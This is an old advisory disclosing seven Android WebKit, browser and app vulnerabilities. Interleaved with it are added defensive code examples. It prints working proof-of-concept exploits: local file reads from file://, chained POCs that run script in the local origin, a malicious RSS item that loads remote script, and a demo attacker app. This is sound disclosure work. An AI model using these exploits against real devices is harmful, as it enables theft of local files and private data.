Android Multiple Vulnerabilities
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt
Ph4nt0m Webzine 0x06 has been released [http://www.80vul.com/webzine_0x06/]. It
carries three papers on Android application security, covering the development
environment, browser security and inter-application communication, and
discloses a number of 0days:
[0day-NO.0] android-webkit local cross-domain vulnerability
android-webkit lets a local HTML file (a page loaded from file://) issue
XMLHttpRequests to any http domain and read any local file, so script running
in the file:// origin can read both. The WebSettings switches that govern this,
setAllowFileAccessFromFileURLs() and setAllowUniversalAccessFromFileURLs(),
only exist from API level 16; on earlier releases the behaviour is always on.
demo:
<script>
// Save this as a local .html file and open it from file://.
// Uncomment one of the two open() targets below before running.
var request = false;
if(window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if(request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if(window.ActiveXObject) {
    // IE fallback, never taken on Android; kept from the original demo
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
        'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',
        'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for(var i=0; i<versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
        } catch(e) {}
    }
}
xmlhttp=request;
//xmlhttp.open("GET", "file://///default.prop", false);   // read a local file
//xmlhttp.open("GET", "http://www.80vul.com/", false);    // read an http domain cross-origin
xmlhttp.send(null);                                        // synchronous request
var ret = xmlhttp.responseText;
alert(ret);                                                // response body is readable from file://
</script>
[0day-NO.1] android-webkit cross-protocol vulnerability
This bug lets an http page navigate a frame into the file:// protocol. The
page embeds an iframe whose server-side source answers with a redirect to a
file:// URL; once the frame is sitting on file://, the http parent is allowed
to set the frame's location to any other file:// URL. demo:
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///default.prop";
}
setTimeout(init,5000)
</script>
location.php (answers the iframe request with a redirect into file://):
<?php
header("Location:file:///80vul.com");
?>
[0day-NO.2] android-webkit file:// protocol xss vulnerability
When android-webkit renders a file:// URL, the directory and file name are
written into the page it generates for that path without any filtering or
HTML escaping, so a crafted path gives cross-site scripting in the file://
origin. demo:
visit this : file:///80vul.com/<script>alert(1);</script>
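To make the [0day-NO.2] failure concrete, here is an added example that is not code from the advisory or from android-webkit: a file:// "not found" page that interpolates the requested path verbatim, next to the same page with the path HTML-escaped. The `render*` functions, `localPath` and the use of the advisory's demo URL as sample input are my construction for illustration.

```javascript
// Added example (not from the advisory): echoing a file:// path into a
// generated page without escaping is XSS in the file:// origin.

// Constructed sample: the URL from the advisory's [0day-NO.2] demo.
const DEMO_URL = 'file:///80vul.com/<script>alert(1);</script>';

// Minimal HTML escaping for text nodes and double-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Path component of a file:// URL, percent-decoded, as the renderer sees it.
function localPath(fileUrl) {
  const u = new URL(fileUrl);
  if (u.protocol !== 'file:') throw new Error('not a file: URL');
  return decodeURIComponent(u.pathname);
}

// Vulnerable: the path is dropped straight into markup, so a crafted
// directory name becomes script running with file:// privileges.
function renderNotFoundVulnerable(fileUrl) {
  const p = localPath(fileUrl);
  return `<html><body><h1>Not found</h1><p>${p}</p></body></html>`;
}

// Hardened: every untrusted string is escaped for the context it lands in.
function renderNotFoundSafe(fileUrl) {
  const p = escapeHtml(localPath(fileUrl));
  return `<html><body><h1>Not found</h1><p>${p}</p></body></html>`;
}
```

The same rule applies to every entry of a directory listing the renderer emits: file names are untrusted data and go through `escapeHtml` (or an attribute-context equivalent for href values) before they touch the page.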
[0day-NO.3] android-browser/firefox auto download the file vulnerability
The Android browser and Firefox for Android handle Content-Disposition:
attachment without any safety prompt, so a web page can silently drop an
attacker-supplied HTML file into the local download directory.
test this code:
<?php
//autodown.php
// Header exactly as used in the test. Note the ':' after "attachment": the
// standard form is "attachment; filename=autodown.htm". A client that parses
// the header strictly finds no filename and falls back to the URL's last path
// segment, which matches the autodown.php entries in the table below.
header("Content-Disposition: attachment:filename=autodown.htm");
$data=<<<android_xss_go
<script>alert(/xss/);</script>
android_xss_go;
print $data;
?>
the local file name and the path:
android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox --> /sdcard/download/autodown.php
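The table above is explained by how each client turns the response into a local file name. The block below is an added example, not the advisory's code and not the actual Android or Firefox implementation: a small model of two header strategies (a strict Content-Disposition parser and a lenient regex), the fallback to the last URL path segment, and the path sanitisation a download manager must do before writing under the download directory. `chooseLocalName`, `sanitizeFilename` and the strict/lenient split are my construction; the header and URL are taken from the advisory.

```javascript
// Added example (not from the advisory): deriving a local file name for the
// autodown.php response, and why clients disagree on the result.

const REQUEST_URL = 'http://www.80vul.com/autodown.php';
// Header exactly as sent by autodown.php (':' instead of ';' before filename).
const MALFORMED_HEADER = 'attachment:filename=autodown.htm';
const CORRECT_HEADER = 'attachment; filename="autodown.htm"';

// Strict parse: "<type>; key=value; ..." with optional double quotes.
function parseContentDisposition(header) {
  const parts = header.split(';').map((s) => s.trim()).filter(Boolean);
  const type = (parts.shift() || '').toLowerCase();
  const params = {};
  for (const p of parts) {
    const eq = p.indexOf('=');
    if (eq < 0) continue;
    const key = p.slice(0, eq).trim().toLowerCase();
    let value = p.slice(eq + 1).trim();
    if (value.length >= 2 && value.startsWith('"') && value.endsWith('"')) {
      value = value.slice(1, -1);
    }
    params[key] = value;
  }
  return { type, params };
}

// Strict: only a well-formed "attachment; filename=..." yields a name.
function strictFilename(header) {
  const { type, params } = parseContentDisposition(header);
  return type === 'attachment' && params.filename ? params.filename : null;
}

// Lenient: grabs whatever follows "filename=" regardless of the separator,
// which is what makes the malformed header "work" on some clients.
function lenientFilename(header) {
  const m = /filename\s*=\s*"?([^";]+)"?/i.exec(header);
  return m ? m[1].trim() : null;
}

// Keep only the base name; refuse control characters and dot names so the
// server cannot steer the file outside the download directory.
function sanitizeFilename(name) {
  const base = name.split(/[\\/]/).pop().replace(/[\x00-\x1f]/g, '').trim();
  if (base === '' || base === '.' || base === '..') return null;
  return base;
}

// Name chosen for the download: header first, URL path as the fallback.
function chooseLocalName(header, requestUrl, { strict }) {
  const fromHeader = header
    ? (strict ? strictFilename(header) : lenientFilename(header))
    : null;
  const candidate = fromHeader && sanitizeFilename(fromHeader);
  if (candidate) return candidate;
  const fromUrl = new URL(requestUrl).pathname.split('/').pop();
  return sanitizeFilename(fromUrl || '') || 'download';
}

// Flags names a browser will typically treat as HTML when opened from
// file://; this is why the POCs below target autodown.htm.
function opensAsLocalHtml(localName) {
  return /\.html?$/i.test(localName);
}
```

Under this model the lenient path reproduces the `autodown.htm` rows and the strict path reproduces the `autodown.php` rows of the table; either way the download must be sanitised to a bare file name, because a `filename` of `../../x.htm` would otherwise be written outside the download directory.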
So, let's play a jigsaw puzzle and chain them:
POC[1]:
//[0day-NO.1]+[0day-NO.2]
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
}
setTimeout(init,5000)
</script>
POC[2]:
//[0day-NO.1]+[0day-NO.3]
<meta http-equiv="refresh" content="0;URL=autodown.php"/>
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///sdcard/Download/autodown.htm";
}
setTimeout(init,5000)
</script>
Now we can execute arbitrary JS code in the local (file://) origin, and from
there, using [0day-NO.0], read any http domain and any local file.
and it goes on ...
[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability
If an attacker controls the second argument (the HTML data) of
webview.loadDataWithBaseURL(), script inside that data can navigate the
WebView into the file:// protocol even though the base URL is http, for
example <script>window.location='file://///default.prop';</script>. demo apk
code:
// inside an Activity's onCreate(); R.id.webview is the WebView in the layout
WebView webview = (WebView) findViewById(R.id.webview);
webview.getSettings().setJavaScriptEnabled(true);
webview.setWebChromeClient(new WebChromeClient());
// "data" stands in for attacker-controlled HTML
String data = "80vul<script>window.location='file://///default.prop';</script>";
// the base URL is http, yet the script lands on a local file
webview.loadDataWithBaseURL("http://www.baidu.com/", data, "text/html", "utf-8", null);
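[0day-NO.1] and [0day-NO.4] are the same missing check seen from two sides: the browser decides whether a frame may go to file:// by looking at where the frame currently is (or at the base URL it was handed) instead of at who initiates the navigation and how the frame got there. The block below is an added example, not code from the advisory or from Android: a pure-JavaScript model of a scheme-transition policy, with the vulnerable rule reconstructed from the advisory's description beside a hardened rule, replayed against the NO.1 redirect chain and the NO.4 loadDataWithBaseURL() payload. The policy objects, the `attacker.example` host and the replay harness are my constructions; on Android the hardened decision belongs in a WebViewClient.shouldOverrideUrlLoading() override, alongside WebSettings.setAllowFileAccess(false) whenever the WebView does not need local content.

```javascript
// Added example (not from the advisory): modelling the cross-protocol
// navigation check that [0day-NO.1] and [0day-NO.4] show to be missing.

function schemeOf(u) {
  return new URL(u).protocol; // 'http:', 'file:', 'javascript:', ...
}

// Vulnerable policy, reconstructed from the advisory's description:
//  - a redirect is followed wherever it points, even from http into file:
//  - scripted navigation into file: is allowed whenever the frame already
//    sits on file:, no matter that the script runs in an http document
const vulnerablePolicy = {
  redirect: (fromUrl, toUrl) => true,
  scripted: (initiatorUrl, frameCurrentUrl, targetUrl) =>
    schemeOf(targetUrl) !== 'file:' || schemeOf(frameCurrentUrl) === 'file:',
};

// Hardened policy:
//  - a non-file response may never redirect into file:
//  - navigation into file: requires the *initiating* document to be file:
//  - javascript: targets are refused outright as navigation requests
const hardenedPolicy = {
  redirect: (fromUrl, toUrl) =>
    schemeOf(toUrl) !== 'file:' || schemeOf(fromUrl) === 'file:',
  scripted: (initiatorUrl, frameCurrentUrl, targetUrl) => {
    const t = schemeOf(targetUrl);
    if (t === 'javascript:') return false;
    if (t === 'file:') return schemeOf(initiatorUrl) === 'file:';
    return true;
  },
};

// Replays the [0day-NO.1] demo: http page -> iframe location.php ->
// "Location: file:///80vul.com" -> parent script sets f.location to a
// file: URL. Returns the frame's final URL. attacker.example is constructed.
function replayRedirectChain(policy) {
  const parent = 'http://attacker.example/poc.html';
  let frame = 'http://attacker.example/location.php';
  const redirectTarget = 'file:///80vul.com';      // redirect from location.php
  if (policy.redirect(frame, redirectTarget)) frame = redirectTarget;
  const scriptedTarget = 'file:///default.prop';   // f.location = ... after 5 s
  if (policy.scripted(parent, frame, scriptedTarget)) frame = scriptedTarget;
  return frame;
}

// [0day-NO.4]: HTML loaded via loadDataWithBaseURL(baseUrl, data, ...) runs
// as baseUrl, and the embedded script sets window.location. The stock
// WebView applies no check here; under the hardened policy the initiator is
// the base URL, so http -> file: is refused. Returns true when the load
// should be overridden (blocked), the same sense as
// WebViewClient.shouldOverrideUrlLoading().
function shouldOverrideUrlLoading(baseUrl, targetUrl, policy = hardenedPolicy) {
  return !policy.scripted(baseUrl, baseUrl, targetUrl);
}
```

shouldOverrideUrlLoading() is only consulted for top-level and frame navigations, not for sub-resource loads, so the scheme check above is a complement to, not a replacement for, disabling file access on the WebSettings.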
[0day-NO.5] com.htc.googlereader XSS vulnerability
com.htc.googlereader is an app shipped on the HTC [G10]. It has an XSS bug;
decompiling it turns up this code:
label399: String str = this.mHeadlineShown.getSummary();   // feed item summary
if (str.trim().contains("<iframe"))
{
    this.mWebView.loadData(str, "text/html", "utf-8");    // only "<iframe" is special-cased
    break label246;
}
// everything else is loaded with an http base URL
this.mWebView.loadDataWithBaseURL("http://", str, "text/html", "utf-8", null);
break label246;
"str" is never filtered (the "<iframe" test is a blacklist that a <script>
payload sidesteps) and comes straight from the feed, so a malicious RSS item
controls it:
<item>
<guid>http://www.80vul.com</guid>
<title>0day-NO.5</title>
<link>http://www.80vul.com</link>
<description><![CDATA[aa<script src='
http://www.80vul.com/xss.js'></script>]]></description>
<dc:creator>80vul</dc:creator>
<category>anddoid</category>
<pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>
</item>
Opening the item while it is still unread triggers the XSS. Since this path
goes through mWebView.loadDataWithBaseURL() with an http base, the injected
script can also cross into file:// via [0day-NO.4].
[0day-NO.6] Some Browsers for android Cross-Application Scripting
Vulnerability
A malicious app can drive the browser into executing arbitrary JS code in its
local (file://) domain: it first sends the browser to a page that silently
downloads an HTML file ([0day-NO.3]), then, after giving the download time to
finish, asks a browser to open that file from the SD card. demo app code:
//code based on http://blog.watchfire.com/files/advisory-android-browser.pdf
package com.x;

// component names of the browsers tested:
//   opera:   com.opera.browser / com.opera.Opera
//   firefox: org.mozilla.firefox / org.mozilla.firefox.App
//   android: com.android.browser / com.android.browser.BrowserActivity
import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class TesttestActivity extends Activity {
    // browser used to trigger the download
    static final String mPackage = "com.android.browser";
    static final String mClass = "com.android.browser.BrowserActivity";
    // browser used to open the downloaded file from file://
    static final String gomPackage = "com.opera.browser";
    static final String gomClass = "com.opera.Opera";
    // page that serves the HTML file with Content-Disposition: attachment
    static final String mUrl = "http://www.80vul.com/autodown.php";
    static final int mSleep = 15000;   // time allowed for the download to finish

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        startBrowserActivity(mUrl);                 // 1. browser downloads the file
        try {
            Thread.sleep(mSleep);                   // blocks the UI thread; acceptable for a PoC
        }
        catch (InterruptedException e) {}
        startBrowserActivitygo("file:///sdcard/Download/g.htm");  // 2. open it in the file:// origin
    }

    // explicit VIEW intent to the downloading browser
    private void startBrowserActivity(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage,mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }

    // explicit VIEW intent handing the browser a file:// URL
    private void startBrowserActivitygo(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(gomPackage,gomClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}
hitest